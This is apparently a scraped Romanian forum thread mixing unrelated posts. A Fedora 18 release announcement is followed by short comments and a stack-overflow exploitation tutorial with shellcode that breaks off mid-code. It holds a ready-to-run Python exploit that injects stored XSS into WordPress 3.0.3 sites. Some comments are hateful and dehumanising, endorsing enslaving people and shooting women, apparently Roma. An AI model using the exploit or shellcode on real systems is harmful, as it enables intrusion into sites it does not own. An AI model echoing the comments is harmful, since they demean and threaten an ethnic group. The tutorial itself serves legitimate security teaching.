F18. This platform for on-premise (private) Infrastructure-as-a-Service clouds uses existing infrastructure to create scalable and secure AWS-compatible cloud resources for compute, network, and storage. * OpenStack: With the Folsom release in Fedora 18, OpenStack continues to have the newest releases in Fedora. 
This open source cloud computing platform enables users to deploy their own cloud infrastructures for private or public cloud deployments. Heat, an incubated OpenStack project, is also available in F18, providing an API that enables the orchestration of cloud applications using file or web based templates. * oVirt Engine: The management application for the oVirt virtualization platform, oVirt Engine, is updated to the newest version, 3.1. This release includes extensive new features, including support for live snapshots, cloning virtual machines from snapshots, quotas, and more. * Suspend and resume support for virt guests: Virtual machines get love with this feature, enabling the ability to suspend and resume guests, with the close of a laptop lid or menu option or via the command line. And that's only the beginning. For a more complete list with details of all the new features in Fedora 18, steer over to: http://fedoraproject.org/wiki/Releases/18/FeatureList == Downloads, upgrades, documentation, and common bugs == The steaks are high--don't miss out on installing the best version of Fedora yet! Get it now: http://get.fedoraproject.org/ If you are upgrading from a previous release of Fedora, refer to: http://fedoraproject.org/wiki/Upgrading Fedora has replaced pre-upgrade with FedUp (excuse the pun.. or don't), a more robust solution, and pushed several bug fixes to older releases of Fedora to enable an easy upgrade to Fedora 18. Graze...er, gaze...upon the full release notes for Fedora 18, guides for several languages, and learn about known bugs and how to report new ones, here: http://docs.fedoraproject.org/ With all the changes to the installer, we particularly recommend reading the Installation Guide: http://docs.fedoraproject.org/en-US/Fedora/18/html/Instal... Everyone makes missteaks. 
Fedora 18 common bugs are documented at: http://fedoraproject.org/wiki/Common_F18_bugs This page includes information on several known bugs in the installer, so we recommend reading it before installing Fedora 18. == Fedora Spins == Fedora spins are alternate versions of Fedora tailored for various types of users via hand-picked application set or customizations, from desktop options to spins for those interested in gaming, robotics, or design software. More information on our various spins is available at: http://spins.fedoraproject.org == Contributing == There are many ways to contribute beyond bug reporting. You can help translate software and content, test and give feedback on software updates, write and edit documentation, design and do artwork, help with all sorts of promotional activities, and package free software for use by millions of Fedora users worldwide. To get started, visit http://join.fedoraproject.org today! == Fedora 19 == Even as we continue to provide updates with enhancements and bug fixes to improve the Fedora number experience, our next release, Fedora 19, is already being developed in parallel and has been open for active development for several months already. We have an early plan for release at the end of May 2013, and the final schedule for F19 is going to be based on the results of the planning process: https://fedoraproject.org/wiki/Releases/19/Schedule == Feature Deprecation == Fedora has always been full of great features, but sometimes we need to cull the herd. Saying good-bye is always hard, but here are the ones we had to put out to pasture this time around. * /etc/sysconfig Deprecations: Several system configurations have moved out of /etc/sysconfig. The goal of these changes is to reduce - as described in http://0pointer.de/blog/projects/the-new-configuration-fi... - the unnecessary differences between Linux distributions and share a standard location for common settings. For a full list of changes read the release notes. 
http://docs.fedoraproject.org/en-US/Fedora/18/html/Releas... == Contact information == If you are a journalist or reporter, you can find additional information here: https://fedoraproject.org/wiki/Press Enjoy! -Robyn Bergeron Sursa: Fedora 18 released [LWN.net]
  6. Buna idee, nu trebuie omorati, trebuie facuti sclavi.
  7. Eu oricum nu inteleg. Omul acela oferea 300 RON tigancilor care se castrau. Ce lege a incalcat? De ce e arestat? Ca nu le dadea bon fiscal?
8. + I wonder if it even knows how to boot from a mini-USB?
  9. [h=2]Wordpress 3.0.3 Stored XSS Exploit[/h] #Exploit Title: Wordpress 3.0.3 Stored XSS exploit (IE7,6 NS8.1) [Revised] #Date: 14/01/2013 #Exploit Author: D35m0nd142 #Vendor Homepage: http://wordpress.org #Version: 3.0.3 #Special thanks to Saif #configuration is reconfigurable according to your own parameters. #!/usr/bin/python import sys,os,time,socket os.system("clear") print "-------------------------------------------------" print " Wordpress 3.0.3 Stored XSS exploit " print " Usage : ./exploit.py <wp website> <text> " print " Created by D35m0nd142 " print "-------------------------------------------------\n" time.sleep(1.5) wp_site = sys.argv[1] text = sys.argv[2] try: sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((sys.argv[1],80)) request = "_wpnonce=aad1243dc1&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message% 3D1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http%3A%2F%2F" request += sys.argv[1] request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&_wp_original_http_referer=http%3A%2F%2F" request += sys.argv[1] request += 
"%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category%5B%5D=0&post_category%5B%5D=1&tax_input%5Bpost_tag%5D=&newtag%5Bpost_tag%5D=&post_title=&samplepermalinknonce=ffcbf222eb&content=%3CIMG+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&excerpt=&trackback_url=&meta%5B108%5D%5Bkey%5D=_edit_last&_ajax_nonce=257f6f6ad9&meta%5B108%5D%5Bvalue%5D=3&meta%5B111%5D%5Bkey%5D=_edit_lock&_ajax_nonce=257f6f6ad9&meta%5B111%5D%5Bvalue%5D=1293465765&meta%5B116%5D%5Bkey%5D=_encloseme&_ajax_nonce=257f6f6ad9&meta%5B116%5D%5Bvalue%5D=1&meta%5B110%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta%5B110%5D%5Bvalue%5D=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145" print "--------------------------------------------------------------------------------------------------------------------------------------" print request print "--------------------------------------------------------------------------------------------------------------------------------------\n" length = len(request) poc = "<IMG STYLE='xss:expression(alert('%s'))'>'" %text print "Trying to execute attack on the remote system . . \nPOC: \n %s\n" %poc time.sleep(0.7) print "Sending %s bytes of data . . 
" % length
    time.sleep(2)
    sock.send("POST /wordpress/wp-admin/post.php HTTP/1.1\r\n")
    sock.send("Host: " + wp_site + "\r\n")
    sock.send("User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)\r\n")
    sock.send("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n")
    sock.send("Accept-Language: en-us,en;q=0.5\r\n")
    sock.send("Accept-Encoding: gzip,deflate\r\n")
    sock.send("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n")
    sock.send("Keep-Alive: 300\r\n")
    sock.send("Proxy-Connection: keep-alive\r\n")
    sock.send("Referer: http://" + wp_site + "/wordpress/wp-admin/post.php?post=145&action=edit&message=1\r\n") #You can change the number of the variable 'post'
    sock.send("Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;wp-settings-time-1=1293196695; wp-settings-time-2=1293197912;wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq\r\n")
    sock.send("Content-Type: application/x-www-form-urlencoded\r\n")
    sock.send("Content-Length: %d\r\n\r\n" % length) # headers must end with CRLF and a blank line before the body
    sock.send(request)
    print sock.recv(1024)
    print "\n[+] Exploit sent with success. Verify manually if the website has been exploited.\n"
except:
    print "[!] Error in your configuration or website not vulnerable\n"

# 99F5C0A5380593CB 1337day.com [2013-01-15] 06CE9157954A5ED6 #

Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  10. 300 RON/femeie? Sunt mai ieftine gloantele.
11. [h=1]Stack Smashing On A Modern Linux System[/h]

21 December, 2012 - 06:56 — jip

Prerequisites: Basic understanding of C and x86_64 assembly.

+++++++++++++++++++++++++++++++++++++++++++
+ Stack Smashing On A Modern Linux System +
+           jip@soldierx.com              +
+++++++++++++++++++++++++++++++++++++++++++

[1. Introduction]

This tutorial will attempt to show the reader the basics of stack overflows and explain some of the protection mechanisms present in modern Linux distributions. For this purpose the latest version of Ubuntu (12.10) has been chosen, because it incorporates several security mechanisms by default, and is overall a popular distribution that is easy to install and use. The platform is x86_64.

The reader will learn how stack overflows were originally exploited on older systems that did not have these mechanisms in place by default. The individual protections in the latest version of Ubuntu at the time of writing (12.10) will be explained, and a case will be presented in which these are not sufficient to prevent the overflowing of a data structure on the stack that results in control of the execution path of the program. Although the method of exploitation presented does not resemble the classical method of overflowing (or "smashing") the stack, and is in fact closer to the method used for heap overflows or format string bugs (exploiting an arbitrary write), the overflow does happen on the stack, in spite of Stack Smashing Protection being used to prevent stack overflows. Now if this does not make sense to you yet, don't worry. I will go into more detail below.

[2.
System details]

An overview of the default security mechanisms deployed in different versions of Ubuntu can be found here: https://wiki.ubuntu.com/Security/Features

-----------------------------------
$ uname -srp && cat /etc/lsb-release | grep DESC && gcc --version | grep gcc
Linux 3.5.0-19-generic x86_64
DISTRIB_DESCRIPTION="Ubuntu 12.10"
gcc (Ubuntu/Linaro 4.7.2-2ubuntu1) 4.7.2
-----------------------------------

[3. The classical stack overflow]

Let's go back in time. Life was easy and stack frames were there to be smashed. Sloppy use of data copying methods on the stack could easily result in total control over the program. Not many protection mechanisms had to be taken into account, as demonstrated below.

-----------------------------------
$ cat oldskool.c
#include <string.h>

void go(char *data) {
    char name[64];
    strcpy(name, data);
}

int main(int argc, char **argv) {
    go(argv[1]);
}
-----------------------------------

Before testing, you should disable ASLR system-wide; you can do this as follows:

-----------------------------------
$ sudo -i
root@laptop:~# echo "0" > /proc/sys/kernel/randomize_va_space
root@laptop:~# exit
logout
-----------------------------------

In very old systems this protection mechanism didn't exist, so for the purpose of this historical example it has been disabled. To disable the other protections, you can compile this example as follows:

$ gcc oldskool.c -o oldskool -zexecstack -fno-stack-protector -g

Looking at the rest of the example, we see that there is a buffer of 64 bytes allocated on the stack, and that the first argument on the command line is copied into this buffer. The program does not check whether that argument is longer than 64 bytes, allowing strcpy() to keep copying data past the end of the buffer into adjacent memory on the stack. This is known as a stack overflow.
Now, in order to gain control of execution of the program, we are going to use the fact that before entering a function, any C program pushes the address of the instruction it is supposed to execute after completing the function onto the stack. We call this address the return address, or Saved Instruction Pointer. In our example the Saved Instruction Pointer (the address of the instruction that is supposed to be executed after completion of the go() function) is stored next to our name[64] buffer, because of the way the stack works.

So if the user can overwrite this return address with any address (supplied via the command line argument), the program will continue executing at this address. An attacker can hijack the flow of execution by copying instructions in their machine code form into the buffer and then pointing the return address to those instructions. When the program is done executing the function, it will continue executing the instructions provided by the attacker. The attacker can now make the program do anything, for fun and profit. Enough talk, let me show you. If you don't understand the following commands, you can find a tutorial on how to use gdb here: http://beej.us/guide/bggdb/

-----------------------------------
$ gdb -q ./oldskool
Reading symbols from /home/me/.hax/vuln/oldskool...done.
(gdb) disas main
Dump of assembler code for function main:
0x000000000040053d <+0>: push %rbp
0x000000000040053e <+1>: mov %rsp,%rbp
0x0000000000400541 <+4>: sub $0x10,%rsp
0x0000000000400545 <+8>: mov %edi,-0x4(%rbp)
0x0000000000400548 <+11>: mov %rsi,-0x10(%rbp)
0x000000000040054c <+15>: mov -0x10(%rbp),%rax
0x0000000000400550 <+19>: add $0x8,%rax
0x0000000000400554 <+23>: mov (%rax),%rax
0x0000000000400557 <+26>: mov %rax,%rdi
0x000000000040055a <+29>: callq 0x40051c
0x000000000040055f <+34>: leaveq
0x0000000000400560 <+35>: retq
End of assembler dump.
(gdb) break *0x40055a
Breakpoint 1 at 0x40055a: file oldskool.c, line 11.
(gdb) run myname
Starting program: /home/me/.hax/vuln/oldskool myname

Breakpoint 1, 0x000000000040055a in main (argc=2, argv=0x7fffffffe1c8)
11 go(argv[1]);
(gdb) x/i $rip
=> 0x40055a : callq 0x40051c
(gdb) i r rsp
rsp 0x7fffffffe0d0 0x7fffffffe0d0
(gdb) si
go (data=0xc2 ) at oldskool.c:4
4 void go(char *data) {
(gdb) i r rsp
rsp 0x7fffffffe0c8 0x7fffffffe0c8
(gdb) x/gx $rsp
0x7fffffffe0c8: 0x000000000040055f
-----------------------------------

We set a breakpoint right before the call to go(), at 0x000000000040055a <+29>. Then we run the program with the argument "myname", and it stops before calling go(). We execute one instruction (si) and see that the stack pointer (rsp) now points to a location containing the address right after the callq go instruction, 0x000000000040055f <+34>. This demonstrates exactly what was discussed above. The following output will demonstrate that when the go() function is done, it will execute the "retq" instruction, which will pop this pointer off the stack and continue execution at whatever address it points to.

-----------------------------------
(gdb) disas go
Dump of assembler code for function go:
=> 0x000000000040051c <+0>: push %rbp
0x000000000040051d <+1>: mov %rsp,%rbp
0x0000000000400520 <+4>: sub $0x50,%rsp
0x0000000000400524 <+8>: mov %rdi,-0x48(%rbp)
0x0000000000400528 <+12>: mov -0x48(%rbp),%rdx
0x000000000040052c <+16>: lea -0x40(%rbp),%rax
0x0000000000400530 <+20>: mov %rdx,%rsi
0x0000000000400533 <+23>: mov %rax,%rdi
0x0000000000400536 <+26>: callq 0x4003f0
0x000000000040053b <+31>: leaveq
0x000000000040053c <+32>: retq
End of assembler dump.
(gdb) break *0x40053c
Breakpoint 2 at 0x40053c: file oldskool.c, line 8.
(gdb) continue
Continuing.
Breakpoint 2, 0x000000000040053c in go (data=0x7fffffffe4b4 "myname")
8 }
(gdb) x/i $rip
=> 0x40053c : retq
(gdb) x/gx $rsp
0x7fffffffe0c8: 0x000000000040055f
(gdb) si
main (argc=2, argv=0x7fffffffe1c8) at oldskool.c:12
12 }
(gdb) x/gx $rsp
0x7fffffffe0d0: 0x00007fffffffe1c8
(gdb) x/i $rip
=> 0x40055f : leaveq
(gdb) quit
-----------------------------------

We set a breakpoint right before the go() function returns and continue execution. The program stops right before executing the "retq" instruction. We see that the stack pointer (rsp) still points to the address inside of main that the program is supposed to jump to after finishing the execution of go(). The retq instruction is executed, and we see that the program has indeed popped the return address off the stack and has jumped to it. Now we are going to overwrite this address by supplying more than 72 bytes of data, using perl:

-----------------------------------
$ gdb -q ./oldskool
Reading symbols from /home/me/.hax/vuln/oldskool...done.
(gdb) run `perl -e 'print "A"x80'`
Starting program: /home/me/.hax/vuln/oldskool `perl -e 'print "A"x80'`

Program received signal SIGSEGV, Segmentation fault.
0x000000000040059c in go (data=0x7fffffffe49a 'A' )
12 }
(gdb) x/i $rip
=> 0x40059c : retq
(gdb) x/gx $rsp
0x7fffffffe0a8: 0x4141414141414141
-----------------------------------

We use perl to print a string of 80 x "A" on the command line, and pass that as an argument to our example program. We see that the program crashes when it tries to execute the "retq" instruction inside the go() function, since it tries to jump to the return address, which we have overwritten with "A"s (0x41). Note that we have to write 80 bytes (64 + 8 + 8) because pointers are 8 bytes long on 64-bit machines, and there is actually another stored pointer between our name buffer and the Saved Instruction Pointer. Okay, so now we can redirect the execution path to any location we want. How can we use this to make the program do our bidding?
If we place our own machine code instructions inside the name[] buffer and then overwrite the return address with the address of the beginning of this buffer, the program will continue executing our instructions (or "shellcode") after it's done executing the go() function. So we need to create a shellcode, and we need to know the address of the name[] buffer so we know what to overwrite the return address with. I will not go into creating shellcode, as this is a little bit outside the scope of this tutorial, but will instead provide you with a shellcode that prints a message to the screen. We can determine the address of the name[] buffer like this:

-----------------------------------
(gdb) p &name
$2 = (char (*)[64]) 0x7fffffffe0a0
-----------------------------------

We can use perl to print unprintable characters to the command line, by escaping them like this: "\x41". Furthermore, because of the way little-endian machines store integers and pointers, we have to reverse the order of the bytes. So the value we will use to overwrite the Saved Instruction Pointer will be:

"\xa0\xe0\xff\xff\xff\x7f"

This is the shellcode that will print our message to the screen and then exit:

"\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48
\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9
\xff\xff\xff\x48\x61\x78\x21"

Note that these are just instructions in machine code form, escaped so that they are printable with perl. Because the shellcode is 45 bytes long, and we need to provide 72 bytes of data before we can overwrite the SIP, we have to add 27 bytes as padding. So the string we use to own the program looks like this:

"\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48
\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9
\xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xa0\xe0\xff\xff\xff\x7f"

The program will jump to 0x7fffffffe0a0 when it is done executing the function go().
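As a side note, the padding arithmetic and the byte-reversal described above can be sanity-checked with a few lines of Python (my own sketch, not part of the original article; `struct.pack` with the `<Q` format performs the little-endian conversion):

```python
import struct

BUF_LEN = 64         # char name[64]
SAVED_RBP = 8        # the saved frame pointer sits between the buffer and the SIP
SHELLCODE_LEN = 45   # length of the message-printing shellcode above

# Bytes needed before we reach the saved instruction pointer: 64 + 8 = 72.
offset = BUF_LEN + SAVED_RBP
padding = b"A" * (offset - SHELLCODE_LEN)   # 27 bytes of filler

# Little-endian: the address 0x7fffffffe0a0 is written lowest byte first.
ret = struct.pack("<Q", 0x7FFFFFFFE0A0)

print(len(padding))   # 27
print(ret.hex())      # a0e0ffffff7f0000
```

The tutorial's payload writes only the six significant bytes ("\xa0\xe0\xff\xff\xff\x7f"); the two high bytes of the packed address are zero anyway and arrive implicitly as the argv string's NUL termination.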
This is where the name[] buffer is located, which we have filled with our machine code. It should then execute our machine code to print our message and exit the program. Let's try it (note that you should remove all line breaks when you try to reproduce this):

-----------------------------------
$ ./oldskool `perl -e 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48
\xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c
\x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xa0\xe0
\xff\xff\xff\x7f"'`
Hax!$
-----------------------------------

It worked! Our important message has been delivered, and the process has exited.

[4. Protection mechanisms]

Welcome back to 2012. The example above does not work anymore, on so many levels. There are a lot of different protection mechanisms in place today on our Ubuntu system, and this particular type of vulnerability does not even exist in this form anymore. There are still overflows that can happen on the stack, though, and there are still ways of exploiting them. That is what I want to show you in this section, but first let's look at the different protection schemes.

[4.1 Stack Smashing Protection]

In the first example, we used the -fno-stack-protector flag to indicate to gcc that we did not want to compile with stack smashing protection. What happens if we leave this out, along with the other flags we passed earlier? Note that at this point ASLR is back on, and so everything is set to its defaults.

$ gcc oldskool.c -o oldskool -g

Let's look at the binary with gdb for a minute and see what's going on.

-----------------------------------
$ gdb -q ./oldskool
Reading symbols from /home/me/.hax/vuln/oldskool...done.
(gdb) disas go
Dump of assembler code for function go:
0x000000000040058c <+0>: push %rbp
0x000000000040058d <+1>: mov %rsp,%rbp
0x0000000000400590 <+4>: sub $0x60,%rsp
0x0000000000400594 <+8>: mov %rdi,-0x58(%rbp)
0x0000000000400598 <+12>: mov %fs:0x28,%rax
0x00000000004005a1 <+21>: mov %rax,-0x8(%rbp)
0x00000000004005a5 <+25>: xor %eax,%eax
0x00000000004005a7 <+27>: mov -0x58(%rbp),%rdx
0x00000000004005ab <+31>: lea -0x50(%rbp),%rax
0x00000000004005af <+35>: mov %rdx,%rsi
0x00000000004005b2 <+38>: mov %rax,%rdi
0x00000000004005b5 <+41>: callq 0x400450
0x00000000004005ba <+46>: mov -0x8(%rbp),%rax
0x00000000004005be <+50>: xor %fs:0x28,%rax
0x00000000004005c7 <+59>: je 0x4005ce
0x00000000004005c9 <+61>: callq 0x400460 <__stack_chk_fail@plt>
0x00000000004005ce <+66>: leaveq
0x00000000004005cf <+67>: retq
End of assembler dump.
-----------------------------------

If we look at go+12 and go+21, we see that a value is taken from $fs+0x28, or %fs:0x28. What exactly this address points to is not very important; for now I will just say fs points to structures maintained by the kernel, and we can't actually inspect the value of fs using gdb. What is more important to us is that this location contains a random value that we cannot predict, as demonstrated:

-----------------------------------
(gdb) break *0x0000000000400598
Breakpoint 1 at 0x400598: file oldskool.c, line 4.
(gdb) run
Starting program: /home/me/.hax/vuln/oldskool

Breakpoint 1, go (data=0x0) at oldskool.c:4
4 void go(char *data) {
(gdb) x/i $rip
=> 0x400598 : mov %fs:0x28,%rax
(gdb) si
0x00000000004005a1 4 void go(char *data) {
(gdb) i r rax
rax 0x110279462f20d000 1225675390943547392
(gdb) run
The program being debugged has been started already.
Start it from the beginning?
(y or n) y
Starting program: /home/me/.hax/vuln/oldskool

Breakpoint 1, go (data=0x0) at oldskool.c:4
4 void go(char *data) {
(gdb) si
0x00000000004005a1 4 void go(char *data) {
(gdb) i r rax
rax 0x21f95d1abb2a0800 2448090241843202048
-----------------------------------

We break right before the instruction that moves the value from $fs+0x28 into rax, execute it, inspect rax, and then repeat the whole process; we see clearly that the value changed between runs. So this is a value that is different every time the program runs, which means that an attacker can't reliably predict it.

So how is this value used to protect the stack? If we look at go+21 we see that the value is copied onto the stack, at location -0x8(%rbp). If we look at the prologue to deduce what that points at, we see that this random value sits right in between the function's local variables and the saved instruction pointer. This is called a "canary" value, referring to the canaries miners used to alert them whenever a gas leak was going on, since the canaries would die well before any human was in danger. Much like that situation, when a stack overflow occurs, the canary value is the first to die, before the saved instruction pointer can be overwritten.

If we look at go+46 and go+50, we see that the value is read from the stack and compared to the original value. If they are equal, the canary has not been changed, and thus the saved instruction pointer hasn't been altered either, allowing the function to return safely. If the value has been changed, a stack overflow has occurred and the saved instruction pointer may have been compromised. Since it's not safe to return, the function instead calls the __stack_chk_fail function. This function does some magic, throws an error, and eventually exits the process.
This is what that looks like:
-----------------------------------
$ ./oldskool `perl -e 'print "A"x80'`
*** stack smashing detected ***: ./oldskool terminated
Aborted (core dumped)
-----------------------------------
So to recap, the buffer is overflowed, and data is copied over the canary value and over the saved instruction pointer. However, before attempting to return to this overwritten SIP, the program detects that the canary has been tampered with and exits safely before doing the attacker's bidding. Now the bad news is that there is not really a good way around this situation for the attacker. You might think about bruteforcing the stack canary, but in this case it would be different for every run, so you would have to be extremely lucky to hit the right value. It would take some time and would not be very stealthy either. The good news is that there are plenty of situations in which this is not sufficient to prevent exploitation. For example, stack canaries are only used to protect the SIP, not to protect application variables. This can lead to other exploitable situations, as shown later. The oldskool method of "smashing" the stack frame to trick the program into returning to our code is effectively killed by this protection mechanism though; it is no longer viable.

[4.2 NX: non-executable memory]

Now you might have noticed we did not just skip the -fno-stack-protector flag this time, but we also left out the -zexecstack flag. This flag told the system to allow us to execute instructions stored on the stack. Modern systems do not allow this to happen: memory is marked either writable, for data, or executable, for instructions. No region of memory will be both writable and executable at the same time. If you think about it, this means that we have no way of storing shellcode in memory that the program could later execute.
Since we cannot write to the executable sections of memory and the program can't execute instructions located in the writable sections of memory, we will need some other way to trick the program into doing what we want. The answer is ROP, or Return-Oriented Programming. The trick is to use pieces of code that are already in the program itself, and thus located in the executable .text section of the binary, and chain them together in a way that resembles our old shellcode. I will not go too deeply into this subject, but I will show you an example at the end of this tutorial. Let me finish by demonstrating that a program will fail when trying to execute instructions from the stack:
-----------------------------------
$ cat nx.c
int main(int argc, char **argv) {
    char shellcode[] =
        "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff"
        "\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48"
        "\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21";
    void (*func)() = (void *)shellcode;
    func();
}
$ gcc nx.c -o nx -zexecstack
$ ./nx
Hax!$
$ gcc nx.c -o nx
$ ./nx
Segmentation fault (core dumped)
-----------------------------------
We placed our shellcode from earlier in a buffer on the stack, and set a function pointer to point to that buffer before calling it. When we compile with -zexecstack like before, the code can be executed on the stack. But without the flag, the stack is marked as non-executable by default, and the program fails with a segmentation fault.

[4.3 ASLR: Address Space Layout Randomization]

The last thing we disabled when trying out the classic stack overflow example was ASLR, by executing echo "0" > /proc/sys/kernel/randomize_va_space as root. ASLR makes sure that every time the program is loaded, its libraries and memory regions are mapped at random locations in virtual memory. This means that when running the program twice, buffers on the stack will have different addresses between runs.
This means that we cannot simply use a static address pointing to the stack that we happened to find using gdb, because these addresses will not be correct the next time the program is run. Note that gdb disables ASLR when debugging a program, but we can re-enable it inside gdb for a more realistic view of what's going on, as shown below (output is trimmed on the right; the addresses are what's important here):
-----------------------------------
$ gdb -q ./oldskool
Reading symbols from /home/me/.hax/vuln/oldskool...done.
(gdb) set disable-randomization off
(gdb) break main
Breakpoint 1 at 0x4005df: file oldskool.c, line 11.
(gdb) run
Starting program: /home/me/.hax/vuln/oldskool

Breakpoint 1, main (argc=1, argv=0x7fffe22fe188) at oldskool.c:11
11	    go(argv[1]);
(gdb) i proc map
process 6988
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
            0x400000           0x401000     0x1000        0x0 /home/me/.hax/vuln
            0x600000           0x601000     0x1000        0x0 /home/me/.hax/vuln
            0x601000           0x602000     0x1000     0x1000 /home/me/.hax/vuln
      0x7f0e120ef000     0x7f0e122a4000   0x1b5000        0x0 /lib/x86_64-linux-
      0x7f0e122a4000     0x7f0e124a3000   0x1ff000   0x1b5000 /lib/x86_64-linux-
      0x7f0e124a3000     0x7f0e124a7000     0x4000   0x1b4000 /lib/x86_64-linux-
      0x7f0e124a7000     0x7f0e124a9000     0x2000   0x1b8000 /lib/x86_64-linux-
      0x7f0e124a9000     0x7f0e124ae000     0x5000        0x0
      0x7f0e124ae000     0x7f0e124d0000    0x22000        0x0 /lib/x86_64-linux-
      0x7f0e126ae000     0x7f0e126b1000     0x3000        0x0
      0x7f0e126ce000     0x7f0e126d0000     0x2000        0x0
      0x7f0e126d0000     0x7f0e126d1000     0x1000    0x22000 /lib/x86_64-linux-
      0x7f0e126d1000     0x7f0e126d3000     0x2000    0x23000 /lib/x86_64-linux-
      0x7fffe22df000     0x7fffe2300000    0x21000        0x0 [stack]
      0x7fffe23c2000     0x7fffe23c3000     0x1000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]
(gdb) run
The program being debugged has been started already.
Start it from the beginning?
(y or n) y
Starting program: /home/me/.hax/vuln/oldskool

Breakpoint 1, main (argc=1, argv=0x7fff7e16cfd8) at oldskool.c:11
11	    go(argv[1]);
(gdb) i proc map
process 6991
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
            0x400000           0x401000     0x1000        0x0 /home/me/.hax/vuln
            0x600000           0x601000     0x1000        0x0 /home/me/.hax/vuln
            0x601000           0x602000     0x1000     0x1000 /home/me/.hax/vuln
      0x7fdbb2753000     0x7fdbb2908000   0x1b5000        0x0 /lib/x86_64-linux-
      0x7fdbb2908000     0x7fdbb2b07000   0x1ff000   0x1b5000 /lib/x86_64-linux-
      0x7fdbb2b07000     0x7fdbb2b0b000     0x4000   0x1b4000 /lib/x86_64-linux-
      0x7fdbb2b0b000     0x7fdbb2b0d000     0x2000   0x1b8000 /lib/x86_64-linux-
      0x7fdbb2b0d000     0x7fdbb2b12000     0x5000        0x0
      0x7fdbb2b12000     0x7fdbb2b34000    0x22000        0x0 /lib/x86_64-linux-
      0x7fdbb2d12000     0x7fdbb2d15000     0x3000        0x0
      0x7fdbb2d32000     0x7fdbb2d34000     0x2000        0x0
      0x7fdbb2d34000     0x7fdbb2d35000     0x1000    0x22000 /lib/x86_64-linux-
      0x7fdbb2d35000     0x7fdbb2d37000     0x2000    0x23000 /lib/x86_64-linux-
      0x7fff7e14d000     0x7fff7e16e000    0x21000        0x0 [stack]
      0x7fff7e1bd000     0x7fff7e1be000     0x1000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]
-----------------------------------
We set "disable-randomization" to "off", run the program twice and inspect the mappings to see that most of them have different addresses. Indeed, not all of them do, and this is the key to successful exploitation with ASLR enabled.

[5. Modern stack overflow]

So, even with all these protection mechanisms in place, sometimes there is room for an overflow. And sometimes that overflow leads to successful exploitation. I showed you how the stack canary protects the stack frame from being messed up and the SIP from being overwritten by copying past the end of a local buffer. But stack canaries are only placed before the SIP, not between variables located on the stack. So it is still possible for a variable on the stack to be overwritten in the same fashion as the SIP was overwritten in our first example.
This can lead to a lot of different problems: in some cases we can simply overwrite a function pointer that is called at some point; in other cases we can overwrite a pointer that is later used to write or read data, and thus control that read or write. The latter is what I am going to show you. By overflowing a buffer on the stack and overwriting a pointer on the stack that is later used to write user-supplied data, the attacker can write data to an arbitrary location. A situation like this can often be exploited to gain control of execution. Here is the source code of the example vulnerability:
-----------------------------------
$ cat stackvuln.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define MAX_SIZE 48
#define BUF_SIZE 64

char data1[BUF_SIZE], data2[BUF_SIZE];

struct item {
    char data[MAX_SIZE];
    void *next;
};

int go(void) {
    struct item item1, item2;
    item1.next = &item2;
    item2.next = &item1;

